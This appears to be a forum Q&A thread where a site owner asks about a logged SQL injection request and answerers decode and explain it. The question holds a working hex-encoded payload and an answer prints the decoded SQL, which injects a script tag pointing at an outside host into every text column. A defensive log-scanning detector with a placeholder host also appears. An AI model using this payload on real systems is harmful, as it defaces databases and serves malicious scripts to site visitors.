I have a public facing website that has been receiving a number of SQL injection attacks over the last few weeks. I exclusively use parameterised stored procedures, so I believe that there have been no successful attacks, but a recent log showed an interesting technique:

Line breaks added for clarity

http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%20@S%20CHAR(4000);SET 
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 
686172283430303029204445434C415245205461626C655F437572736F7220435552534F 
5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69 
6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72 
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970 
653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420 
46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528 
404046455443485F5354415455533D302920424547494E20657865632827757064617465 
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C 
736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373 
7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077 
6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73 
6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372 
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854 
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043 
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43
7572736F72 AS CHAR(4000));EXEC(@S);&_X="

Can anyone shed light on what the "CAST and EXEC" is attempting to do?

+22  A: 

Below is the decoded SQL that they were trying to push:

DECLARE @T varchar(255),
        @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 

OPEN Table_Cursor FETCH NEXT 
FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
  BEGIN exec('update ['+@T+'] SET ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] WHERE '+@C+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
  FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor
Ishmaeel
How did you un-encode this?
Guy
Googling "hex to string" gave me this: http://www.string-functions.com/hex-string.aspx. After that, it was a simple matter of SQL pretty-printing.
Ishmaeel
*Smacks head* Thank you ever so much for such a fast response.
Guy
Seen this attempt too; they tried it on a LAMP stack.
Jacco
An even easier way to decode: paste the above into Query Analyzer or an equivalent query engine, and change exec(@s) to print @s. Voila.
Sam Meldrum
there's a massive Chinese botnet that's striking all across the web, trying this on every form in every page it can find. We get probed with this several times a day -- a useful, though annoying, way to show that we're immune to such attacks.
Danimal
+11  A: 

The code, when deciphered from hex into chars, seems to go through all your database tables, select all columns that are of text/char type, and at the end of each value of this type add a malicious script execution from http://www2.s800qn.cn/csrss/w.js. Now, if your website has at least one place where you don't escape text data retrieved from your database, your site's users will have this malicious script executed on their machines.

DzinX
+3  A: 

I think we've had this attack before. It's trying to insert a <script> tag in every field in every table in the database.

jammus
+1  A: 

The simplest Python algorithm to decipher the hex code is this:

# The hex between CAST(0x and AS CHAR in the logged request, truncated here
text = "4445434C415245204054207661726368617228323535292C404..."

def getText():
    # Walk the hex string two characters at a time: each pair is one byte,
    # which is one character of the original SQL
    for i in range(0, len(text), 2):
        byte = text[i:i+2]
        char = int(byte, 16)
        toPrint = chr(char)
        yield toPrint

print(''.join(getText()))
DzinX
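Going one step beyond the one-off decoder above, here is an added example (not from any answer on this page) that scans web-server request lines for this same CAST(0x... AS CHAR) / EXEC pattern, decodes the payload and flags the cursor-over-sysobjects defacement worm the other answers describe. The sample request and the shortened payload it carries are constructed for the example, and attacker.example is a placeholder script host, not the real one.

```python
import re
from urllib.parse import unquote

# A hex literal handed to CAST(... AS CHAR/VARCHAR/NCHAR/NVARCHAR) and then EXEC'd,
# the shape of the request logged in the question.
CAST_HEX_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)

# Strings that, once the payload is decoded, mark it as the mass-defacement worm the
# answers describe: a cursor over sysobjects/syscolumns that UPDATEs a <script> tag in.
INDICATORS = ("sysobjects", "syscolumns", "<script", "exec(", "update [")

def decode_cast_payloads(request_line):
    """Decode every CAST(0x... AS CHAR) literal in one logged request line.

    URL-decodes first (the log shows %20 for spaces); a blob that is not valid
    hex, or has odd length, is skipped so one bad line cannot abort a log scan."""
    decoded = []
    for hexblob in CAST_HEX_RE.findall(unquote(request_line)):
        try:
            decoded.append(bytes.fromhex(hexblob).decode("latin-1"))
        except ValueError:
            continue
    return decoded

def classify_request(request_line):
    """Return (is_suspicious, sorted indicator hits, decoded payloads) for one log line."""
    payloads = decode_cast_payloads(request_line)
    hits = sorted({ind for p in payloads for ind in INDICATORS if ind in p.lower()})
    return bool(hits), hits, payloads

# Constructed sample request: same encoding scheme as the question's log entry, carrying
# a shortened stand-in for the decoded SQL with a placeholder script host.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) "
    "BEGIN exec('update ['+@T+'] set ['+@C+']=''<script src=\"http://attacker.example/w.js\">"
    "</script>''+['+@C+']') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_LOG_LINE = (
    "GET /mypage.asp?l_surname=Z;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S);&_X= HTTP/1.1"
)
BENIGN_LOG_LINE = "GET /mypage.asp?l_surname=Smith&_X= HTTP/1.1"
```

Feeding a real access log through classify_request line by line gives you the decoded SQL for review rather than the opaque hex, and the benign line comes back with no hits.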
+6  A: 

Run this, for example in mysql:

select CAST(0x44...72 AS CHAR(4000)) as a;

and you'll know. Ishmaeel pasted the code.

This is a SQL Server worm, not a targeted attack.

Tometzky
+3  A: 

It's an adware-dropper script, built to clog up your database with <script> tags that show up on your pages. It's encoded because most servers would explode if you tried to push that junk through the URL.

Most things like this are random-attempt-attacks in that they'll hit anything with a querystring but it might be a targeted attack. Test your site to make sure it's not letting any SQL from querystrings execute. Just using parametrised queries should cover you.

Oli
Yes, I also encode my QUERYSTRING and FORM fields, remove angle brackets etc. etc. and the other usual data hygiene stuff!
Guy